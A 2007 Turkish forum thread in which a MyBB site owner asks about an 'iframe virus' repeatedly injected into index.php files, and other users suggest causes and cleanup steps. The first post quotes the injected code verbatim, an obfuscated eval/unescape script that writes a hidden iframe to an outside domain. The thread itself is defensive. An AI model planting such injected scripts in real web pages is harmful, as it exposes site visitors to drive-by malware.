Anasayfa FORUMLAR Üye Girişi Dosyalar Dersler İpuçları Yardımcı Araçlar Hakkımızda
KİMLER BAĞLI
Toplam Üye: 32638
Aktif Üye: 0
Aktif Ziyaretçi: 865
Üye Adı
Şifre
Beni Hatırla
          Yeni Üye KayıtYeni Üye Kayıt
          Şifremi UnuttumŞifremi Unuttum
FORUMLAR
 Formlarda yazılanlar ekra..
(4030 okuma, 0 yanıt)
 MyBB 1.2 Kurulum(Resimli ..
(6445 okuma, 1 yanıt)
 mybb kurulum hatası..
(5517 okuma, 1 yanıt)
 Mybb -> BBtonuke Dönüş..
(5116 okuma, 1 yanıt)
 bu sorun cikariyor bana..
(5544 okuma, 2 yanıt)
 MyBB Son Sürüm..
(9286 okuma, 6 yanıt)
 MYBB Seo l Site Maps l Me..
(6919 okuma, 4 yanıt)
 MyBB 1.4 Forum Türkçe Yam..
(8149 okuma, 5 yanıt)
 Cracker Tracker 1.07{MyBB..
(6660 okuma, 2 yanıt)
 PHP Nukeye Mybb Entegre E..
(18420 okuma, 18 yanıt)
 Mybb Kurulumu..
(4356 okuma, 0 yanıt)
 MyBB 1.4.1 Tam Türkçe Kur..
(4640 okuma, 0 yanıt)
 mybb forumum google seo l..
(5287 okuma, 1 yanıt)
 Php Nukeye Mybb Entegresi..
(8714 okuma, 6 yanıt)
 overview linkleri yeni sa..
(4704 okuma, 0 yanıt)
 mybb siteyi sol tarafa ya..
(4656 okuma, 0 yanıt)
 Postbit Menü MybbTurkiye ..
(6320 okuma, 1 yanıt)
 MyBB hata Türkçe Karakter..
(4680 okuma, 0 yanıt)
 Mybb Super Flv Player Myc..
(4849 okuma, 0 yanıt)
 Youtube MyKod (Plugin&..
(9696 okuma, 8 yanıt)
 mybb database sorunu..
(5207 okuma, 0 yanıt)
 lycos ta mybb kurdum ufak..
(5653 okuma, 1 yanıt)
 iframe virüsü kurtuluşu ?..
(10781 okuma, 8 yanıt)
 .htaccess yazabilcek arka..
(4544 okuma, 0 yanıt)
 Mk Portal'ın MyBB'ye Kuru..
(6394 okuma, 1 yanıt)
 MyBB-Wodrpress Entegresi..
(8816 okuma, 5 yanıt)
 YBFrss Otomatik Sitemap(l..
(8933 okuma, 5 yanıt)
 Anasayfada Son Konu yazar..
(4898 okuma, 0 yanıt)
 MyBB SEO 1.0 Beta 9..
(4567 okuma, 0 yanıt)
 Hoşgeldiniz Paneli..
(5037 okuma, 0 yanıt)
 Overview 3.0.4..
(4960 okuma, 0 yanıt)
 Forumların Başına İcon Ek..
(5536 okuma, 0 yanıt)
 Hızlı Kayıt Ol Eklentisi..
(4746 okuma, 0 yanıt)
 SeoArsiv Mod..
(4906 okuma, 0 yanıt)
 MyBB Güvenliğini Arttıral..
(6665 okuma, 2 yanıt)
 Sitenize Duyuru Panosu..
(6933 okuma, 2 yanıt)
 php-nuke'den myBB'ye..
(15545 okuma, 16 yanıt)
 mybb forum admin paneline..
(6311 okuma, 1 yanıt)
 YBf Artık Mybb Olarak Onl..
(9449 okuma, 7 yanıt)
 aktivasyon linki ve alt f..
(6265 okuma, 2 yanıt)
 Sitede üye olunamıyor !..
(10596 okuma, 7 yanıt)
 mybbde tema ve dil yükle..
(7025 okuma, 3 yanıt)
 Hide Hack 1.2..
(6559 okuma, 2 yanıt)
 CGC AyYıldız Teması V4..
(8430 okuma, 3 yanıt)
 myBB Türkçe 1.2x Çeviri 3..
(5963 okuma, 1 yanıt)
 EfixClub TRed Theme..
(5961 okuma, 1 yanıt)
 1.20 Moderatör Bloğu &..
(7793 okuma, 3 yanıt)
 Fenerbahçe Teması[MyBB 1...
(14376 okuma, 12 yanıt)
 MyBB 1.2.1 Güvenlik Günce..
(8051 okuma, 4 yanıt)
 MyBB MTR Paket v4..
(5593 okuma, 1 yanıt)
Netopsiyon Online: Forums
Netopsiyon Online :: Başlık görüntüleniyor - i f r a m e virüsü kurtuluşu ?
 AramaArama   RütbelerRütbeliler   ProfilProfil   GirişGiriş 


i f r a m e virüsü kurtuluşu ?

 
Bu forum kilitlendi: mesaj gönderemez, cevap yazamaz ya da başlıkları değiştiremezsiniz   Bu başlık kilitlendi: mesajları değiştiremez ya da cevap yazamazsınız    Netopsiyon Online Forum Ana Sayfa -> MyBB Forumu
Önceki başlık :: Sonraki başlık  
Yazar Mesaj
mechulsun
Mesaj: 50+
Mesaj: 50+





Kayıt: Mar 19, 2007
Mesajlar: 52

MesajTarih: 2007-10-02, 17:16:41    Mesaj konusu: i f r a m e virüsü kurtuluşu ? Alıntıyla Cevap Gönder

merhabalar

ikidebir siteme böle kod ekleniyor. avaba kendi kendinemi ekliyo. birisimi ekliyo. bıktım düzeltmekten.
Forumum mybb
admin/index.php dosyasına ce
index.php
dosyalarına ekleniyor. site curcuna gözüküor. o zaman. bozuk şeklinde oluyor.

Kod:
echo "<body id=\"logo\"><script>e v a l(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%6 5%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%65%63%32% 31%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%61%74%6f%6d%61%6b%61%79%61%6e%2e%62 %69%7a%2f%69%6e%64%65%78%2e%70%68%70%3f%6f%75%74%3d%31%31%39%30%32%33%38%37%33%3 2%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28% 29%2a%32%32%33%34%34%36%29%2b%27%35%65%37%33%31%39%5c%27%20%77%69%64%74%68%3d%36 %36%39%20%68%65%69%67%68%74%3d%33%33%34%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6 c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>\n";


En son mechulsun tarafından 2007-10-05, 03:50:16 tarihinde değiştirildi, toplam 1 kere değiştirildi
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
Bu Site Google Adsense ile Gelir Elde Ediyor









Tarih: 2024-03-29, 11:39:39    Mesaj konusu: Forum Arası Reklamlar


Başa dön
nofel
Mesaj: 500+
Mesaj: 500+





Kayıt: Apr 25, 2005
Mesajlar: 655

MesajTarih: 2007-10-02, 19:43:02    Mesaj konusu: Alıntıyla Cevap Gönder

bu sitelere bulaşan i f r a m e virüsü olmasın sakın Very Happy

dikkatli olmak lazım Very Happy

kurtul bi an önce derim Very Happy
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
mechulsun
Mesaj: 50+
Mesaj: 50+





Kayıt: Mar 19, 2007
Mesajlar: 52

MesajTarih: 2007-10-03, 08:22:28    Mesaj konusu: Alıntıyla Cevap Gönder

ya ben dosyanın yenisini atıyorum. yine bulaşıyo. mybbnin bütün dosyalarına attım. düzeliyor. sonra ine böle oluyo.
ve sitemi indirdim. tarama yaptırdım hiçbişey yok ama hala bu kod ekleniyo oraya delirdim artık Sad(((8
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
durdu
Mesaj: 50+
Mesaj: 50+





Kayıt: Jun 19, 2006
Mesajlar: 82
Konum: Giresun/Ordu.arasi

MesajTarih: 2007-10-03, 14:11:43    Mesaj konusu: Alıntıyla Cevap Gönder

off off kardeş o sorun bendede var .sorunu cöze bilirsen buraya yaz bizde bilgirenek

20 gündür uğlaşim Sad
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
mechulsun
Mesaj: 50+
Mesaj: 50+





Kayıt: Mar 19, 2007
Mesajlar: 52

MesajTarih: 2007-10-05, 03:48:45    Mesaj konusu: Re: bu kod ne oluyor Alıntıyla Cevap Gönder

Arkadaşlar Ben Sorunu Buldum. Bulaşanlara Bilgi Amaçlı olsun diye Yardımcı olayım.

Bu Kod İframe Virüsü oluyormuş. O Virüs pcden ftp programı yoluyla ulaşmıştır.... Bütün İndex.php veya İndex.html Dosyalarına Yerleşmektedir. Yapmamız Gereken ise o virüslü kodu siliniz. Yenisi Varsa Upload ediniz...

Sonra Pcye Format atınız bence.
Format atar atmaz ftp şifresini değiştiriniz...
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
PhP_CoDeR
Mesaj: 200+
Mesaj: 200+





Kayıt: Oct 28, 2003
Mesajlar: 299

MesajTarih: 2007-10-05, 07:39:02    Mesaj konusu: Alıntıyla Cevap Gönder

1- Sadece indexlere bulaşmıyor,
2- Index yada bulaştığı dosyayı değiştirmek çözüm değil,
3- PC ye format atmak da önemli değil,
4- FTP Şifresi de sorun olmaz...

Daha önce bu konuda epey bilgi vermiştim... Geçmiş mesajlara bakarsanız, daha detaylı bilgilere ulaşabilirsiniz.


http://eski.netopsiyon.com/modules.php?name=Forums&file=viewtopic&t=32224&highlight=

http://eski.netopsiyon.com/modules.php?name=Forums&file=viewtopic&t=32671&highlight=
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
amanav
Mesaj: 500+
Mesaj: 500+





Kayıt: Dec 08, 2002
Mesajlar: 928
Konum: Viyana

MesajTarih: 2007-10-05, 10:17:59    Mesaj konusu: Alıntıyla Cevap Gönder

PhP_CoDeR :
1- Sadece indexlere bulaşmıyor,
2- Index yada bulaştığı dosyayı değiştirmek çözüm değil,
3- PC ye format atmak da önemli değil,
4- FTP Şifresi de sorun olmaz...

Daha önce bu konuda epey bilgi vermiştim... Geçmiş mesajlara bakarsanız, daha detaylı bilgilere ulaşabilirsiniz.


http://eski.netopsiyon.com/modules.php?name=Forums&file=viewtopic&t=32224&highlight=

http://eski.netopsiyon.com/modules.php?name=Forums&file=viewtopic&t=32671&highlight=


gelişimi...
1. sitenizde açık bulunan bir modül aracılığı ile sitenize .dosya.php .dosya.html gibi bir dosya atıyor bu dosya bir çeşit ftp aracı özelliği taşıyor...
2. yüklenen dosya ile dilediği yere yazdırıp çizdirip değer değiştirip yenilikler yapılabiliyor...
3. bunu yemişseniz ne yaparsanız yapın kurtuluşunuz yok...

çözüm...

1. şüphelendiğiniz modülleri siliniz
2. kodu yiyen dosyaları yenileri ile değiştirip ftp şifrenizi değiştiriniz...
3. şüpheli modüller sırası ile: fıkra, şiir, My_eGallery, coppermine, Köşe_Yazıları (alt sürümleri 4.3-2 alt sürümleri) Card, Site_Messenger 1.4 den alt sürümleri, son olarak shoutbox 8.5 alt sürümleri...

Not: youtube ve benzeri modüller bu kategori içinde yer alabilirler...
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
PhP_CoDeR
Mesaj: 200+
Mesaj: 200+





Kayıt: Oct 28, 2003
Mesajlar: 299

MesajTarih: 2007-10-05, 13:43:31    Mesaj konusu: Alıntıyla Cevap Gönder

Bunun tek çaresi ya virüsü bulup sileceksiniz ki virüsü ayırt etmek bayağı bir zor. Genellikle cpanel kullanan kişilerde mail klasörüne yerleşiyor. mail klasörünü komple bilgisayarınıza indirin nortonun en güncel hali ile tarayın size tavsiyem... Eğer virüsü bulursa, hangi klasörde olduğuna bakın, ftp den o dosyayı silin. Virüs temizlenmiş olacaktır. Defalarca bu yöntemle birçok kişiyi virüsten kurtardım.

İkincisi ise, virüsü bulamadığınız takdirde, tek çareniz hostu silmeniz ve tekrar oluşturmanız. Bunun için tüm yedeklerinizi alın, host yetkilisine hesabınızı silip tekrar oluşturmasını iletin. Yeni hesabınız oluşturulduğunda tüm dosyalarınızı (tabi tekrar antivirüs ile taramanızda fayda var...) siteye yükleyin. Bunu da deneyen arkadaşlarım olumlu sonuç aldılar.

Not: Unutmayın ki eklediği kodları silmek asla kalıcı çözüm değildir. Virüsü siteden atmadıkça o her zaman zararlarını gösterecektir.

Kolay gelsin...
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
Bu Site Google Adsense ile Gelir Elde Ediyor









Tarih: 2024-03-29, 11:39:39    Mesaj konusu: Forum Arası Reklamlar


Başa dön
ultrAslanYavuz
Tema Sorumlusu
Tema Sorumlusu





Kayıt: Jun 25, 2006
Mesajlar: 1217

MesajTarih: 2007-10-05, 13:50:36    Mesaj konusu: Alıntıyla Cevap Gönder

codere katılıyorum. benim basıma gelmişti.mail klasöründeydi virüs ve silinmiyordu.yedekelri aldım ve hostu sıfırlattırdım. sonra tekrar siteyi attım sorun yok.bu arada şifreleri değişmede fayda var.ben ftp yi bi arkadaşımla beraber kullanıyordum.o diyordu benim bilgisayarda virüs olmaz vs. en sonunda dedim kaspersky in son sürümünü indir ve bilgisayarı virüs dolu cıktı.yani anlayacagınız hatayı illaki kendinizde aramayınız.en iyi yol bence yedeklerinizi alın virüsten ayırın daha sonraşifrenizi değiştirin ve tekrar atın.
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
Önceki mesajları göster:   
Bu forum kilitlendi: mesaj gönderemez, cevap yazamaz ya da başlıkları değiştiremezsiniz   Bu başlık kilitlendi: mesajları değiştiremez ya da cevap yazamazsınız    Netopsiyon Online Forum Ana Sayfa -> MyBB Forumu Tüm zamanlar GMT + 3 Saat
1. sayfa (Toplam 1 sayfa)

 
Geçiş Yap:  
Bu forumda yeni başlıklar açamazsınız
Bu forumdaki başlıklara cevap veremezsiniz
Bu forumdaki mesajlarınızı değiştiremezsiniz
Bu forumdaki mesajlarınızı silemezsiniz
Bu forumdaki anketlerde oy kullanamazsınız

Benzer Konular

Başlık Yazar Forum Cevaplar Tarih
Yeni mesaj yok Foruma iframe Kodları Calısmıyor cuneytsonmez NukeBB Eklentileri 4 2010-05-22, 00:49:02 Son Mesajı Görüntüle
Yeni mesaj yok Forumda iframe kullanmak Vizyon Php Nuke Sorunlarınız 4 2010-01-03, 19:44:43 Son Mesajı Görüntüle
Yeni mesaj yok Iframe de download sorunu AndersNystrom Php Nuke Sorunlarınız 0 2009-09-29, 16:38:15 Son Mesajı Görüntüle
Yeni mesaj yok Block iframe canpolat03 Php Nuke Sorunlarınız 3 2009-09-20, 22:24:53 Son Mesajı Görüntüle
Yeni mesaj yok IFRAME Virüs Nasıl Bulaşır? denizcifcii Php Nuke Sorunlarınız 3 2009-09-14, 15:00:47 Son Mesajı Görüntüle

Copyright © 2002-2024 Netopsiyon Bilişim Teknolojileri San. Tic. Ltd.Şti. - Bütün hakları saklıdır!
Bu site Netopsiyon.com.tr Sunucularında Barındırılmaktadır.
Netopsiyon Bilişim Teknolojileri San. Tic. Ltd.Şti. Netopsiyon Copyright